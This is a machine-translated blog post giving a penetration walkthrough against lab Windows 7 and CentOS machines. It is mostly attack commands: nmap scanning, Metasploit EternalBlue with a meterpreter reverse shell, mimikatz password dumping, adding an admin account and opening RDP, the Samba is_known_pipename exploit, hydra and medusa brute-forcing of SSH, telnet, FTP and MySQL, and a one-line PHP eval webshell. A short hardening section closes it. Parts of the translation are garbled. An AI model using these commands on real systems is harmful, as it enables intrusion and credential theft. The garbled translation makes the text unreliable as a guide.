penetration

Others 2019-10-23 03:51:02 views: null

                  1, penetration windows7 

1. Preparing the environment

Penetration machine: a kali ip: 192.168.191.153

Drone: a windows7 windows7ip: 192.168.191.130 contos6 ip: 192.168.191.167

2, open the machine permeation kali.

3, first performed using nmap to scan, and then analyze the results of the scan, if port 445 open, 445 priority attack.

nmap command: nmap -sV -T5 -n 192.168.191.130

 

 

 

 Show results

1, the operating system: Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

2,80,135,139,445,1801,2103,2107,49152,49153,49154,49155,49156,49157,49158 ports are opened.

4. Now we attack 445 port, msfconsole Metasploit open command in Kali (input msfconsole in the terminal).

 

 

I do not know the path to the search command: search ms17_010

Then run the command: use exploit / Windows / smb / ms17_010_eternalblue # use MS17_010 exploit program

set RHOST 192.168.191.130 # set the target host IP

set payload windows/x64/meterpreter/reverse_tcp                   #设置payload   

#tcp not to use the following several payload

#set payload windows/x64/meterpreter/reverse_http

#set payload windows/x64/meterpreter/reverse_https

#set payload windows/x64/meterpreter/reverse_ftp

set LHOST 192.168.191.153 # Set the local host IP

show options # view the settings information

exploit # attack

 

 

 The attack is successful, then use the command load mimikatz

 

 

 Then use wdigest

000 found to have a user password is 111.

Then quit. Command: ctrl + c

 

 

 When you quit the command: run getgui -e telnet Open 3389

 

 

  Open a new terminal command: rdesktop ip

 

 

——————————————————————————————————————————————————————————————————————————

 

 

 If you use the command wdigest found no users will create a user.

Next, create a user

First enter the shell

 

 

 Create a user command net user username password / add

 

 

net localroup Administratros username / add 

Because of his record of drones is not so Administratros group creation failed.

Successful

 There is a newly opened terminal command: rdesktop ip

 

 

 

 Penetration is complete, you can do whatever they want.

Windows7 and 2008 with  exploit / windows / smb / ms17_010_eternalblue

Other versions use exploit / windows / smb / ms08_067_netapi 

          2, penetration linux

1. Preparing the environment

Penetration machine: a kali ip: 192.168.191.153

Drone: a windows7 windows7ip: 192.168.191.1 contos6 ip: 192.168.191.167

2, open the machine permeation kali.

3, first performed using nmap to scan, and then analyze the results of the scan, if port 445 open, 445 priority attack.

nmap command: nmap -sV -T5 -n 192.168.191.167

 

 

 

Show results

1, the operating system: Unix, Linux

2,21,22,23,80,139,445,3306 ports are opened.

4. Now we attack 445 port, msfconsole Metasploit open command in Kali (input msfconsole in the terminal).

 

 

 

I do not know the path to the search command: search is_known

Then run the command: use exploit / Linux / Samba / is_known_pipename               

set RHOST 192.168.191.167 # set the target host IP

show options # view the settings information

exploit # attack

Returns a shell can be equal to the termination linux pleases.

2, ssh port 22

I do not know the path to the search command: search ssh_login

1, then run the command: use Auxiliary / Scanner / SSH / ssh_login               

set rhost 192.168.191.168 # set the target host IP

set USERNAME root # Set the user name # set USERPASS_FILE dictionary

set PASS_FILE dictionary password # # set PASSWORD password            

show options # view the settings information

exploit # attack

2、hydra -l root -P /root/123.txt 192.168.191.167 ssh

3、medusa -h 192.168.191.167 -u root -P /root/123.txt -M ssh

 

3, telnet # default root user can not log on port 23

I do not know the path to the search command: search telnet_login

1, then run the command: use Auxiliary / Scanner / the Telnet / telnet_login             

set rhost 192.168.191.167 # set the target host IP

set USERNAME admin # Set the user name # set USERPASS_FILE dictionary

set PASS_FILE dictionary password # # set PASSWORD password            

show options # view the settings information

exploit # attack

2、hydra -l admin -P /root/123.txt 192.168.191.167 telnet

3、medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet

 

4, ftp port 21

I do not know the path to the search command: search ftp_login

1, then run the command: use Auxiliary / Scanner / the FTP / ftp_login              

set rhost 192.168.191.167 # set the target host IP

set USERNAME admin # Set the user name # set USERPASS_FILE dictionary

set PASS_FILE dictionary password # # set PASSWORD password            

show options # view the settings information

exploit # attack

2、hydra -l admin -P /root/123.txt 192.168.191.167 ftp

3、medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet

 

5, mysql port 3306

I do not know the path to the search command: search mysql_login

1, then run the command: use Auxiliary / Scanner / MySQL / mysql_login              

set rhost 192.168.191.167 # set the target host IP

set USERNAME root # Set the user name # set USERPASS_FILE dictionary

set PASS_FILE dictionary password # # set PASSWORD password            

show options # view the settings information

exploit # attack

 

 

——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————

6, http and mysql statement that looks at

Word Trojan <? Php @eval ($ _ GET [ "123"]);?>

1.php?123=system("cat /");

cmd interface cat /

mysql select load_file("/");

 

           3, strengthening all the services except Windows 445 and linux445, http environment does not know how to write

1、ftp 

vim /etc/vsftpd/vsftpd.conf
the remote login configuration file is closed, the whole yes no change is required.
service vsftpd reload

2、ssh

passwd root

Change the root password and delete common user

vim /etc/passwd
修改:lynn:x:500:500::/home/lynn:/bin/bash
为: lynn:x:500:500::/home/lynn:/sbin/nologin

Direct Line also deleted

3、telnet

telnet
vim /etc/passwd

Delete the average user

4、mysql 

Change your password or disable remote access server mysql

To disable remote access server mysql, mysql can modify the configuration file: /etc/mysql/my.cnf
add [mysqld] the following sentence: bind-address = 127.0.0.1 is binding allows access to ip ip-based machines

change Password

use mysql;
set password for root@localhost = password('123');

Guess you like

Origin www.cnblogs.com/linglinglingling/p/11723701.html
Recommended
Ranking
vue project automated build tools 1.0, support for multi-page build
JDBC add, update, delete data
SpringCloud combat service in response to the decline tutorial series (Chapter IV)
A segmentation fault (core dumped) error occurs when C+11 compiles and calls the PCL library
Django achieve websocket
Go语言并发之道--笔记1
Three-tier structure and application
Zhejiang data structure after-school exercise practice two 7-2 Reversing Linked List (25 points)
Front-end interview brushing day9 (updated daily high-frequency inspection points for front-end interviews)
The difference between the shell of the single and double quote
Daily
More
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)

Code World

© 2018 codetd.com